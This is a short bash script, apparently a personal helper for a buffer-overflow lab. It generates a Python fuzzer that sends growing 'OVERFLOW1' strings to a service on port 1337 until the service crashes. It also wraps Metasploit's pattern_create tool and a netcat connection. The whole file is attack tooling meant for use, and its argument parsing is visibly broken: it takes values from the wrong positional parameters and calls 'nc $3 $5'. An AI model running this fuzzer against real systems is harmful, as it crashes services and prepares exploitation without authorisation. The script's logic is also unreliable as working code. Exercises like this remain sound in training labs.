#!/bin/bash

BoF=$(basename $0)

fuzz(){
	if [ $USER = root ] ; 
	then
		cat <<EOF > Fuzzing.py

#!/usr/bin/env python3

import socket, time, sys

#change IP address
ip = ""

port = 1337
timeout = 5
prefix = "OVERFLOW1 "

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
EOF
else
	echo "You need to be root or sudo to run the fuzzing command"
fi
} 


sc1=$1
sc2=$2
sc3=$3
sc4=$4

case $sc1 in
	"-f" | "--fuzzing")
		fuzz
		;;
	"-pc" | "--pattern-create")
		/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l $2
		;;
	"-nc" | "--netcat")
		sub2=$2
		sub3=$3
		case $sub2 in
			"-RH" | "--remote-host")
				RH=$2
				;;
		esac
		case $sub3 in
			"-RP" | "--remote-port")
				RP=$3
				;;
		esac
		nc $3 $5
		echo "nc '$3' '$5'"
		;;
	"-LP" | "--LPORT")
		LPORT=$2
		echo $LPORT
		;;
	*)
        	shift
		;;
esac

case $sc2 in
	"-i" | "--ip-address")
		;;
	*)
        	shift
		;;
esac
